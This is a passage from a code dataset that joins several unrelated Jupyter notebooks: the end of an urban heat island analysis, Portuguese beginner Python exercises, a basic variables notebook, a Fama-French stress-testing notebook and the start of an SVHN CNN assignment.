)$', \n #'$\\Delta T_u$, Moist - Dry ($^\\circ C$)', \n 
)\nplt.plot(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']), \n rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']),)\n# highlight cities where difference is stat. significant\n# here significance is same for urban and rural, but may need to check if running results for different period\nsig_cities = urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index\nplt.scatter(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']).loc[sig_cities], \n urban_resultsDF['Moist'].subtract(urban_resultsDF['Dry']).loc[sig_cities],\n color = 'k')\nplt.title('b)')\n\nplt.legend(['Best fit', 'y=x', 'p>0.05', 'p<0.05'], loc = 4)\nplt.axhline(0, linestyle =':', color = 'k')\nplt.axvline(0, linestyle =':', color = 'k')\nplt.savefig('plots/version6/synopticwxTuTr.pdf')\nplt.savefig('plots/version6/figure4.eps')\n# -\n\ndata = [UHI_resultsDF['MoistCount'], UHI_resultsDF['DryCount']]\ndict = plt.boxplot(data)\nplt.ylabel('Number of Days')\ntix = plt.xticks([1,2,],['Moist', \n 'Dry',\n ])\nplt.title('Days for each Wx Type')\n\nurban_resultsDF\n\nUHI_resultsDF['MoistCount'].mean(), UHI_resultsDF['DryCount'].mean()\n\nUHI_resultsDF['Dry'].subtract(UHI_resultsDF['Moist']).mean(), UHI_resultsDF['Dry'].subtract(UHI_resultsDF['Moist']).std()\n\n# Dry UHI significantly different than moist in \na = UHI_resultsDF[UHI_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = UHI_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry UHI significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Dry urban significantly different than moist in \na = urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = urban_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry $T_u$ significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Dry rural significantly different than moist in \na = rural_resultsDF[rural_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = rural_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry $T_r$ significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Are the cities for which T_u differs by synoptic type the the same cities for T_r? 
\nnp.setdiff1d(rural_resultsDF[rural_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0], \n urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0])\n\npaired_df.shape\n\nUHI_resultsDF.shape\n\nx = 0.2\nind = paired_df[paired_df['Urban distance'] < x].index\nprint(UHI_resultsDF['Dry'].loc[ind].dropna().shape)\nprint(scipy.stats.ttest_ind(UHI_resultsDF['Dry'].loc[ind].dropna(),\n UHI_resultsDF['Moist'].loc[ind].dropna()))\nUHI_resultsDF['Dry'].loc[ind].subtract(UHI_resultsDF['Moist'].loc[ind]).mean()\n\n(UHI_resultsDF['Dry']- UHI_resultsDF['Moist']).loc[paired_df['Urban distance']< .25].hist()\n\n(UHI_resultsDF['Dry']- UHI_resultsDF['Moist']).loc[paired_df['Urban distance']< .2].mean()\n\nUHI_resultsDF['Dry'].hist()\n\nUHI_resultsDF['Moist'].hist()\n\n# +\n# replicate Darryn's Baltimore analysis for science center versus BWI\ncity = 'Baltimore'\nssc_code = stations[stations['Station'].str.contains(city)]['ID'].values\nif city == 'Washington, D.C.': \n ssc_code = np.array(['IAD'])\nif ssc_code.shape[0] > 0: \n file = filepath + ssc_code[0] + '.dbdmt'\n synopticDF = pd.read_table(file, sep = ' ', header = None)\n synopticDF.columns = ['id','date', 'ssc']\n synopticDF.index = pd.PeriodIndex(synopticDF['date'], freq = 'D', name = 'month_period')\n synopticDF['ssc'].loc[synopticDF['ssc']> 60] =6.5\n synopticDF = synopticDF.loc['1985-06-01':]\n\n urbanID = paired_df.loc[city]['Urban station']\n ruralID = paired_df.loc[city]['Rural station']\n # Downloadd from NCDC the station data, using the station ID listed in station list\n urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,\n as_dataframe=True, update = False)\n ruraldata = ulmo.ncdc.ghcn_daily.get_data('USW00093721',#ruralID,\n as_dataframe=True, update = False)\n rural_tmin = pd.to_numeric(ruraldata['TMIN']['1985-01-01':].value/10.) #rural tmin\n urban_tmin = pd.to_numeric(urbandata['TMIN']['1985-01-01':].value/10.) 
\n\n # extract summertime data \n rural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\n urban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n # clean data: eliminate min temperatures below 4 or above 35\n rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n #calculate UHI\n UHI = urban_summer - rural_summer\n\nrural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\nurban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n# # clean data: eliminate min temperatures below 4 or above 35\n# rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n# urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n#calculate UHI\nUHI = urban_summer - rural_summer\n# see if we can reproduce darryn's plots\nUHI = urban_summer - rural_summer\n\nfig, axes = plt.subplots(6,1, figsize = [4,20])\nplt.subplots_adjust(hspace=0.75)\ni = 0\nfor year in range(2009, 2015): \n x = synopticDF['ssc']\n y = UHI['%s-06-01'%year:'%s-08-30'%year]\n x = x[y.index]\n axes[i].scatter(x, y)\n d =y[x<=3].mean() - y[x>3].mean()\n axes[i].axhline(y[x<=3].mean(), xmin = .1, xmax=.4)\n axes[i].axhline(y[(x>3) & (x<7)].mean(), xmin = .5, xmax=.9)\n axes[i].annotate('Diff = %2.2f'%d , xy = (0.01,0.02), xycoords = 'axes fraction')\n axes[i].set_xlabel('ssc')\n axes[i].set_ylabel('UHI')\n axes[i].set_title('SC - BWI %s'%( year))\n i = i+1\n# -\n\n\n","repo_name":"gottscott/heat","sub_path":"Synoptic Wx Plots.ipynb","file_name":"Synoptic Wx Plots.ipynb","file_ext":"py","file_size_in_byte":18556,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"18720340041","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"g3H3AMmpK7-q\"\n# . 
Faça uma função que recebe, por parâmetro, um valor inteiro e positivo e retorna se ele é par.\n#\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"zXR4c7qwK7Fd\" outputId=\"e5d91424-f484-499d-d6f3-a574fa255f07\"\nnumero=int(input(\"Entre com um número: \"))\ndef par(numero):\n if numero%2==0:\n resposta='S' \n else:\n resposta='N'\n return resposta\n\nresultado=par(numero)\nif resultado =='S':\n print('Eh par')\nelse:\n print('Eh impar') \n\n\n \n\n# + [markdown] id=\"jV3qntB8PnCE\"\n# Faça duas funções, ambas recebem um inteiro, por parâmetro, uma retorna o sucessor deste número e a outra retorna o antecessor.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Eaov7mn4Ppns\" outputId=\"b34bfce7-5f90-4179-a7c9-e1de1355209d\"\ndef sucessor(numero):\n resposta = numero+1\n return resposta\n\ndef antecessor(numero):\n resposta2 = numero-1\n return resposta2\n\nnumero = int(input('Informe um número: '))\nnumero1=sucessor(numero)\nnumero2=antecessor (numero)\nprint (f'O número é {numero}\\nO sucessor é {numero1}\\nO antecessor é {numero2}') \n\n# + id=\"th0HrF6qS9qE\"\n\n\n# + [markdown] id=\"K1Ys_Su4RpeE\"\n#\n\n# + [markdown] id=\"EYoyINV7Rpjk\"\n# Faça uma função que recebe, por parâmetro, um valor inteiro e positivo e retorna quantos divisores tem esse valor.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0exxCaAaRqSM\" outputId=\"ac109149-7a71-4ecb-cd3c-ee9994845505\"\ndef divisor (numero): \n cont=0\n for c in range(1,numero+1):\n if numero%c==0:\n cont+=1\n return cont \n\nnumero=int(input('Digite um número maior que 0: '))\nnumero1=divisor(numero)\nprint(numero1) \n\n\n# + [markdown] id=\"7hJV9h_NUFhs\"\n# Escreva uma função que recebe por parâmetro um valor inteiro e positivo N e retorna o valor double de seu fatorial\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Q5V-51OMUGHM\" outputId=\"7b8d2818-84d8-4f95-cd16-1ad33291714d\"\ndef fatorial (numero):\n resultado=1\n for c in range(1,numero+1):\n resultado*=c\n \n\n return resultado #Esse return determina qual será o valor da função definida( aqui no caso fatorial). 
Não sendo necessário\n #colocar o resultado em outra variável como fizemos no exemplo anterior, já que aqui só temos 1 return.\n\nnumero= int(input('Informe um número positivo: '))\nprint(f'{fatorial(numero):f}') \n","repo_name":"Rcoronetti/Google-Colab","sub_path":"Algoritimos,Exer9_py.ipynb","file_name":"Algoritimos,Exer9_py.ipynb","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"5653011374","text":"4+4\n\nName= 'RAJ'\nAGE= 45\nSALARY= 50000\n\n\na=None\n\nX=0.003\nY=4.456\nZ=-35.6\nz=23e4\n\nName = \"the Car\"\ncolor='white'\nInstitute='''the watch'''\n\nis_coding=True\nis_fun= True\nare_u_bored=False\n\nname=['Raj','Rishabh','Harpreet','Gore']\n\ncolors=['RED','GREEN','YELLOW']\n\nvals=[1,2,3.4,0.004,5,'Python']\n\nfixed_values=(1,3,5,7,11)\n\na={5,10,15,20,25}\nb={3,4,4,4,5,6,7,8,}\n\n\ncar_info={\"brand\":\"Ford\",\"Model\":\"006\",\"year\":\"002\"}\n\n\n","repo_name":"RGBRAND/Python-DS-course-at-digipodium","sub_path":"basics.ipynb","file_name":"basics.ipynb","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"3082267302","text":"# # Fama-French 3-factor Model\n\nimport pandas as pd\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom datetime import datetime\nimport statsmodels.formula.api as sm\nimport matplotlib.pyplot as plt \n\n\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', None)\npd.set_option('display.max_colwidth', 500)\n\n# # Estimation Stage\n\n# **Fama-French Model**\n\n# +\n#returns data\n\nwrds_return = pd.read_excel(\"wrds_data.xlsx\", sheet_name='returns')\nwrds_return = pd.DataFrame(wrds_return[wrds_return.columns[:-5]])\nwrds_return['date'] = wrds_return['Date'].apply(lambda x: datetime.strptime(x, \"%Y-%m\"))\nwrds_return.set_index('date', inplace=True)\nwrds_return.drop(columns=['Date'], inplace=True)\nwrds_return['market_premium'] = wrds_return['S&P RETURN'] - wrds_return['RISK-FREE RATE']\nwrds_return.head(4)\n\n\n# +\n#convert to quarterly frequency\n\nwrdsq_return = wrds_return.resample('Q').mean()\nwrdsq_return.reset_index(inplace=True)\nwrdsq_return['quarter_date'] = pd.PeriodIndex(wrdsq_return.date, freq='Q')\nwrdsq_return.head(3)\n\n# +\n#running stock-by-stock 3-factor Fama-French regressions\nwrdsq_return.rename(columns={'RISK-FREE RATE':'rf', 'FAMA-FRENCH SIZE FACTOR (SMB)' : 'smb', \n 'FAMA-FRENCH VALUE FACTOR (HML)': 'hml'}, inplace=True)\n\n\n#renaming firms to gett rid of space\nfor firm in wrdsq_return.columns[7:-1]:\n firm_new = firm.replace(' ', '_').replace('-', '_')\n for pattern in ['&', '__', '(', ')']:\n firm_new = firm_new.replace(pattern, '')\n wrdsq_return.rename(columns={firm: firm_new}, inplace=True)\n \nwrdsq_return.head(3)\n\n# +\n#regressing and adding coefficients\n\nrsquared = []\nfirm_parameters = {}\nfor n, firm in enumerate(wrdsq_return.columns[8:-3]): #for each firm\n firm_parameters[firm] = {}\n wrdsq_return['firm_minus_rf'] = wrdsq_return[firm] - wrdsq_return['rf']\n result = sm.ols(formula=\"firm_minus_rf ~ market_premium + smb + hml -1\", \n data=wrdsq_return).fit(cov_type='HAC', cov_kwds={'maxlags':4})\n #residual plots\n plt.plot(result.resid)\n plt.title(f\"Residual Plot from Fama-French 3 factor for {firm}\")\n plt.savefig(f'residual{n}.png')\n plt.show()\n \n #adjusted r-squared\n rsquared.append(result.rsquared_adj)\n coeffs = 
dict(result.params)\n for coeff in coeffs:\n firm_parameters[firm][coeff] = coeffs[coeff]\n\n\nprint('Number of firms: ', len(firm_parameters))\nfirm_parameters\n# -\n\n#adjusted R-squared values\nrsquared\n\n# +\n#sample regression result summary\n\nprint(f'OLS for firm {firm}')\nresult = sm.ols(formula=\"firm_minus_rf ~ market_premium + smb + hml -1\", \n data=wrdsq_return).fit(cov_type='HAC', cov_kwds={'maxlags':4})\nresult.summary()\n\n\n# -\n\n# **Regressing the 3 factors on historical MEVSs**\n\n# +\nmev_historic = pd.read_csv('2021-table_1a_historic_domestic.csv')\n\n#renaming column names to get rid of space and stuff\nfor column_name in mev_historic.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n mev_historic.rename(columns={column_name: column_name_new}, inplace=True)\n\nmev_historic.rename(columns={'date': 'Date'}, inplace=True) \nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nmev_historic['date_str'] = mev_historic['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nmev_historic['date'] = pd.to_datetime(mev_historic.date_str)\nmev_historic['quarter_date'] = pd.PeriodIndex(mev_historic.date, freq='Q')\nmev_historic.drop(columns=['date', 'date_str', 'Date', 'scenario_name'], inplace=True)\nmev_historic.head(2)\n# -\n\nwrds_for_mev = wrdsq_return[['market_premium', 'smb', 'hml', 'date']]\nwrds_for_mev['quarter_date'] = pd.PeriodIndex(wrds_for_mev.date, freq='Q')\nwrds_for_mev.drop(columns=['date'], inplace=True)\nwrds_for_mev = pd.DataFrame(wrds_for_mev[wrds_for_mev['quarter_date'] >= '1976Q1'])\nwrds_for_mev.head(2)\n\n\n# +\n#check that the date ends at 2020Q4. 
It does\n\nwrds_for_mev.tail(2)\n\n# +\n#merge financial variables with MEVs\n\nmev_wrds_merged = mev_historic.merge(wrds_for_mev, on='quarter_date', indicator='unmatched')\nmev_wrds_merged.head(2)\n# -\n\nquery_xvars = ' + '.join(mev_wrds_merged.columns[:-5])\nquery_xvars\n\n\n# +\nvariables = ['market_premium', 'smb', 'hml']\n\nmev_regression_parameters = {}\nfor factor in variables: #for each factor\n #mev_regression_parameters[factor] = {}\n result = sm.ols(formula=\"{} ~ \".format(factor) + query_xvars + \"-1\", \n data=mev_wrds_merged).fit(cov_type='HAC',cov_kwds={'maxlags':4})\n mev_regression_parameters[factor] = dict(result.params)\n\nprint('Number of factors: ', len(mev_regression_parameters))\nmev_regression_parameters\n\n\n# +\n#sample regression on MEVs\n\nresult = sm.ols(formula=\"market_premium ~ \" + query_xvars + \"-1\", \n data=mev_wrds_merged).fit(cov_type='HAC', cov_kwds={'maxlags':4})\nresult.summary()\n\n# -\n\n# # Simulation Stage\n\n# **Predict the factors for 2020 using the scenario**\n\n# +\n#scenario1 data\n\nscenario1 = pd.read_csv('2021-table_3a_supervisory_severely_adverse_domestic.csv')\nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nscenario1['date_str'] = scenario1['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nscenario1['date'] = pd.to_datetime(scenario1.date_str)\nscenario1['quarter_date'] = pd.PeriodIndex(scenario1.date, freq='Q')\nscenario1.drop(columns=['date_str', 'Date', 'Scenario Name', 'date'], inplace=True)\nscenario1 = scenario1[scenario1['quarter_date'] < '2022Q1']\n\n\n#change names\nfor column_name in scenario1.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n scenario1.rename(columns={column_name: column_name_new}, inplace=True)\n\n\nscenario1\n\n\n# +\ndef predict_factors_2022(row, dict_coeffs):\n '''\n predict the three factors using a scenario.\n The scenario will be in the dataset the row\n of which is passed in the apply function. \n \n dict_coeffs contains the regression coefficients\n from regressing factors on historical MEV\n data.\n '''\n data_row = dict(row)\n results = {}\n for factor in mev_regression_parameters:\n factor_value = 0\n for variable in mev_regression_parameters[factor]:\n coeff = mev_regression_parameters[factor][variable]\n xvalue = data_row[variable]\n factor_value += coeff*xvalue\n results[factor] = factor_value\n\n return results['market_premium'], results['smb'], results['hml']\n\n\n \n\n# +\n#Predict factors. 
Using 3 month treasury as risk-free return\n\nscenario1['mkt_premium_hat'],\\\n scenario1['smb_hat'],\\\n scenario1['hml_hat'] = zip(*scenario1.apply(lambda x: predict_factors_2022(x, mev_regression_parameters), axis=1))\n\npredicted_factors = pd.DataFrame(scenario1[['quarter_date', 'mkt_premium_hat', 'smb_hat', 'hml_hat']])#, 'three_month_treasury_rate']])\npredicted_factors.rename(columns={'mkt_premium_hat': 'market_premium',\n 'smb_hat': 'smb',\n 'hml_hat': 'hml'}, inplace=True)#, \n #'three_month_treasury_rate': 'rf'}, inplace=True)\npredicted_factors \n\n# -\n\npredicted_factors_array = np.array(predicted_factors)\npredicted_factors_array\n\n\n# **Forecasting the Stock Returns using predicted factors from historical MEVs**\n\n# +\nforecasted_returns = {}\nfor date in [pd.Period('2021Q1', 'Q-DEC'), \n pd.Period('2021Q2', 'Q-DEC'), \n pd.Period('2021Q3', 'Q-DEC'), \n pd.Period('2021Q4', 'Q-DEC')]:\n forecasted_returns[date] = {}\n \nforecasted_returns\n\n# +\n#forecasted stock returns\n\nfor predicted_scenario in predicted_factors_array: #forecasted factors from MEV regression\n dict_predicted_values = dict(zip(predicted_factors[1:], predicted_scenario)) #make it a dictionary\n forecasted_returns[dict_predicted_values['quarter_date']] = [] #for a date, make a list\n for firm in firm_parameters: #firm with its estimated factor coefficients\n forecast_return = 0\n for variable in firm_parameters[firm]: #iterate over factor coefficients\n forecast_return += firm_parameters[firm][variable]*dict_predicted_values[variable]\n \n forecast_return += 0.1 #add in risk-free return (3 month treasury)\n forecasted_returns[dict_predicted_values['quarter_date']].append(forecast_return)\n \nscenario1_forecasts = pd.DataFrame.from_dict(forecasted_returns, orient='index')\nscenario1_forecasts.columns = list(firm_parameters.keys())\nscenario1_forecasts\n\n# +\n#return on total portfolio\n\npd.DataFrame(scenario1_forecasts.mean(axis=1)).rename(columns={0: 'Portfolio Return SC1'})\n# -\n\n# **Scenario 2**\n\n# +\n#scenario1 data\n\nscenario2 = pd.read_csv('2021-table_2a_supervisory_baseline_domestic.csv')\nquarter_number = {'Q1': '01', 'Q2': '04', 'Q3': '07', 'Q4': '10'}\nscenario2['date_str'] = scenario2['Date'].apply(lambda x: x.split(' ')[0] + '-' + quarter_number[x.split(' ')[1]])\nscenario2['date'] = pd.to_datetime(scenario2.date_str)\nscenario2['quarter_date'] = pd.PeriodIndex(scenario2.date, freq='Q')\nscenario2.drop(columns=['date_str', 'Date', 'Scenario Name', 'date'], inplace=True)\nscenario2 = scenario2[scenario2['quarter_date'] < '2022Q1']\n\n\n#change names\nfor column_name in scenario2.columns:\n column_name_new = column_name.replace(' ', '_').replace('-', '_').lower()\n for pattern in ['&', '__', '(', ')']:\n column_name_new = column_name_new.replace(pattern, '')\n\n correction_dictionary = {'3': 'three', '5': 'five', '10': 'ten'}\n for pattern in ['3', '5', '10']:\n column_name_new = column_name_new.replace(pattern, correction_dictionary[pattern])\n scenario2.rename(columns={column_name: column_name_new}, inplace=True)\n\n\nscenario2\n\n# +\n#predict factors\n\nscenario2['mkt_premium_hat'],\\\n scenario2['smb_hat'],\\\n scenario2['hml_hat'] = zip(*scenario2.apply(lambda x: predict_factors_2022(x, mev_regression_parameters), axis=1))\n\npredicted_factors_scenario2 = pd.DataFrame(scenario2[['quarter_date', 'mkt_premium_hat', 'smb_hat', 'hml_hat']])#, 'three_month_treasury_rate']])\npredicted_factors_scenario2.rename(columns={'mkt_premium_hat': 'market_premium',\n 'smb_hat': 'smb',\n 'hml_hat': 
'hml'}, inplace=True)#, \n #'three_month_treasury_rate': 'rf'}, inplace=True)\npredicted_factors_scenario2\n\n\n# -\n\npredicted_factors_array_sc2 = np.array(predicted_factors_scenario2)\npredicted_factors_array_sc2\n\n\n# +\nforecasted_returns_sc2 = {}\nfor date in [pd.Period('2021Q1', 'Q-DEC'), \n pd.Period('2021Q2', 'Q-DEC'), \n pd.Period('2021Q3', 'Q-DEC'), \n pd.Period('2021Q4', 'Q-DEC')]:\n forecasted_returns_sc2[date] = {}\n \nforecasted_returns_sc2\n\n# +\n#forecasted stock returns\n\nfor predicted_scenario in predicted_factors_array_sc2: #forecasted factors from MEV regression\n dict_predicted_values = dict(zip(predicted_factors_scenario2[1:], predicted_scenario)) #make it a dictionary\n forecasted_returns_sc2[dict_predicted_values['quarter_date']] = []\n for firm in firm_parameters: #firm with its estimated coefficients\n forecast_return = 0\n for variable in firm_parameters[firm]: #factor coefficients\n forecast_return += firm_parameters[firm][variable]*dict_predicted_values[variable]\n \n forecast_return += 0.1 #add back risk-free rate (3 month treasury)\n forecasted_returns_sc2[dict_predicted_values['quarter_date']].append(forecast_return)\n \nscenario2_forecasts = pd.DataFrame.from_dict(forecasted_returns_sc2, orient='index')\nscenario2_forecasts.columns = list(firm_parameters.keys())\nscenario2_forecasts\n# -\n\n# ### Comparing Equally-Weighted Portfolio Returns \n\n# +\n#return on total portfolio\n\np_ret_sc1 = pd.DataFrame(scenario1_forecasts.mean(axis=1)).rename(columns={0: 'Severe'})\np_ret_sc2 = pd.DataFrame(scenario2_forecasts.mean(axis=1)).rename(columns={0: 'Baseline'})\np_ret_sc1.merge(p_ret_sc2, left_index=True, right_index=True)\n# -\n\n# ### Back Test\n\ntickers = ['BIIB', 'JNJ', 'LLY', 'MRK',\n 'PFE', 'BAC', 'C', 'GS', 'JPM',\n 'MS', 'ADM', 'CAG', 'CL', 'CPB', \n 'K', 'KHC', 'KO', 'PG', 'TSN', 'WMT']\n\nbacktest = pd.read_csv('back-test.csv')\nbacktest = backtest[backtest['TICKER'].isin(tickers)]\nbacktest['date'] = backtest['date'].apply(lambda x: datetime.strptime(str(x), \"%Y%m%d\"))\nbacktest.set_index('date', inplace=True)\nbacktest['RET'] = backtest['RET'].astype(float)\nbacktestq = backtest[['RET']].resample('Q').mean()\nbacktestq.reset_index(inplace=True)\nbacktestq['quarter_date'] = pd.PeriodIndex(backtestq.date, freq='Q')\nbacktestq = pd.DataFrame(backtestq[['quarter_date', 'RET']]).set_index('quarter_date')\nbacktestq.rename(columns={'RET': 'Realized Returns'}, inplace=True)\nbacktestq\n\n# +\n#Have all required tickers\n\nbacktest['TICKER'].unique()\n\n# +\n#comparing with our two projections\n\np_ret_sc1.merge(p_ret_sc2, left_index=True, right_index=True).merge(backtestq, left_index=True, right_index=True)\n# -\n\n# ### Back Testing using Realized Returns from WRDS\n\n# We download the realized returns for the 20 tickers from WRDS to compare our projections with the actual realized portfolio returns. The realized returns are closer to our severe scenario projections (see above), which would be inline with the market stress due to the COVID-19 pandemic. 
If anything, the true returns reflect that the market was under greater stress i.e., MEVs were considerably worse than those given by the Fed Severe scenario (which is also intuitive since COVID was one very big unanticipated shock)\n\n# ### Performance Testing\n\n# +\n#check stationarity in the historical portfolio\n\nplt.plot(wrdsq_return[wrdsq_return.columns[7:-2]].mean(axis=1))\nplt.title('Return of the Portfolio (Equally-Weighted)')\nplt.show()\n# -\n\n# **Comment on Stationarity:** The historical portfolio return is quite stationary over time as it is also expressed in percentage change, which usually induces stationarity in series. However, some variables in the historical and scenario MEVs could be non-stationary e.g., house price index, dow_jones_total_stock_market_index_level. Removing the trend from these series could improve performance.\n#\n\n# **Notes:**\n#\n# 1. We run stock-by-stock estimation of Fama-French 3 factor model to get $\\beta$ coefficients. We utilize the maximum available period for each stock to get better coverage. \n#\n# 2. Fama-French method would proceed in two steps. First, I estimate the 3-factor model for each stock. Then, I regress each of those three factors on historical MEVs. Using the scenario values for those MEVs, then, I forecast the factors and eventually the returns. In sum, there are two regressions (one corresponding to each step). In the first classic 3-factor regression, we get an adjusted-R squared of around ~0.30. The R-squared for the 2nd-step regression is higher and around ~0.40. I use heteroskedasticity and autocorrelation-adjusted (HAC) standard errors.\n#\n# 3. The forecasted portfolio return is lower under the 'Severe' scenario and high under the 'Baseline' scenario. This result is both intuitive and according to expectations.\n#\n# 4. The $\\beta$ coefficients should be estimated using data on both the 'normal' and 'stress' periods. The reason is as follows: using one specific state of the business cycle (i.e., boom or bust) for estimation would wrongfully capture the effect of macroeconomic shocks and label them as the effect of systemic risk, and hence generating an estimate of $\\beta$ that is specific to that time period. It is, hence, desirable to use both periods and make use of all the variation in the data to estimate the true $\\beta$\n#\n# 5. The Fama-French model is balanced when it comes to complexity and interpretability. It uses a theoretical structure (Fama-French factors) and links it back to fluctuations in the macroeconomy. CAPM, arguably, is too simple and the 'general factor model' is theory-less (a pure reduced-form structure). Fama-French (with MEVs) model seems to be a decent balance between theory and forecasting using MEVs. \n#\n# 6. Model performance would be equally affected by noise and bias in the data. Under high bias, the projected average portfolio returns would be far away from the 'true' returns. While more noise may give us the true projections, but the standard errors are going to be too large to make any confident/reliable statement.\n#\n# 7. CAPM seems to be more sensitive to the law of small numbers simply because the returns are modelled as a function of two variables. Hence, any change in those variables would change the projections by a lot. Multi-factor regression, on the other hand, models stock returns as a function of a _number_ of macroeconomic variables, making it robust to changes in any one variable. \n#\n# 8. Model selection is an important part of stress testing. 
In the end what matters is the _out-of-sample_ performance of a forecasting model (not part of this assignment). So, a model could have robust in-sample forecasts, but could miserably fail when it comes to out-of-sample forecasts. Therefore, choosing the 'best' model needs to incorporate some kind of out-of-sample evaluation. \n#\n# 9. The residual plots from Fama-French 3 factor model are more or less stable and stationary (i.e., the residuals have an average of 0 and oscillate around mean zero). This re-ensures that we don't have a potential model misspecification. \n\n\n\n\n","repo_name":"alanwake47/FINM-35000-Topics-in-Econ","sub_path":"CP/PSet3/fama-french-model.ipynb","file_name":"fama-french-model.ipynb","file_ext":"py","file_size_in_byte":18112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"21092164153","text":"# + [markdown] id=\"dYgpzGuMdx8-\" colab_type=\"text\"\n# #Assignment 2 - CNN over SVHN\n#\n# In this assignment you are requested to build a convolutional network and train it over the SVHN data, which is a collection of 3X32X32 images, classified into 10 digits. For more information about the dataset, you may go to \n# http://ufldl.stanford.edu/housenumbers/\n\n# + id=\"Q5w6wIzcd1LG\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"0d743272-3c3b-4868-85c3-7060ca944ac8\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n# %cd '/content/drive/My Drive/Practical topics in Machine Learning/EX2'\n\nimport os\nimport numpy as np\nimport torch\nfrom time import time\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\ntrainset = torchvision.datasets.SVHN(root='./data', split='train',\n download=True, transform=transforms.ToTensor())\n\ntestset = torchvision.datasets.SVHN(root='./data', split='test',\n download=True, transform=transforms.ToTensor())\n\n# + id=\"ytzC8AfzOK3J\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 34} outputId=\"089a0ce8-b107-4701-c22d-da0d8b91e10a\"\nlen(testset)\n\n# + id=\"92MoItRaOPzU\" colab_type=\"code\" colab={}\n# Use dataloaders for train and test (batch size is 8)\n\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,\n shuffle=True)\n\ntestloader = torch.utils.data.DataLoader(testset, batch_size=8,\n shuffle=False)\n\n# + id=\"nPTY-2frOTP0\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 34} outputId=\"7077e456-91fe-4d08-db73-c73df36d323c\"\n# The images are tensors of 3, 32, 32\ntrainset[0][0].shape\n\n\n# + [markdown] id=\"E6jH2cjTVnVi\" colab_type=\"text\"\n# Here is what you need to do; you are encoureged to look at notebook \"Notebook 11 - CIFAR CNN\" when trying to complete the next steps.\n#\n#\n# Write a network SVHNCnn, that has the following architecture:\n#\n# * Convolution with 10 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Convolution with 5 3X3 filters\n# * Relu\n# * Convolution with 16 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Convolution with 24 3X3 filters\n# * Relu\n# * Max pool with 2X2\n# * Liner, output size 128\n# * Relu\n# * Liner, output size 64\n# * Relu\n# * Liner, output size 10\n\n# + id=\"-bgkfG-NOd5n\" colab_type=\"code\" colab={}\nclass SVHNCnn(nn.Module):\n\n def __init__(self):\n super(SVHNCnn, self).__init__()\n self.conv1 = nn.Conv2d(3, 10, 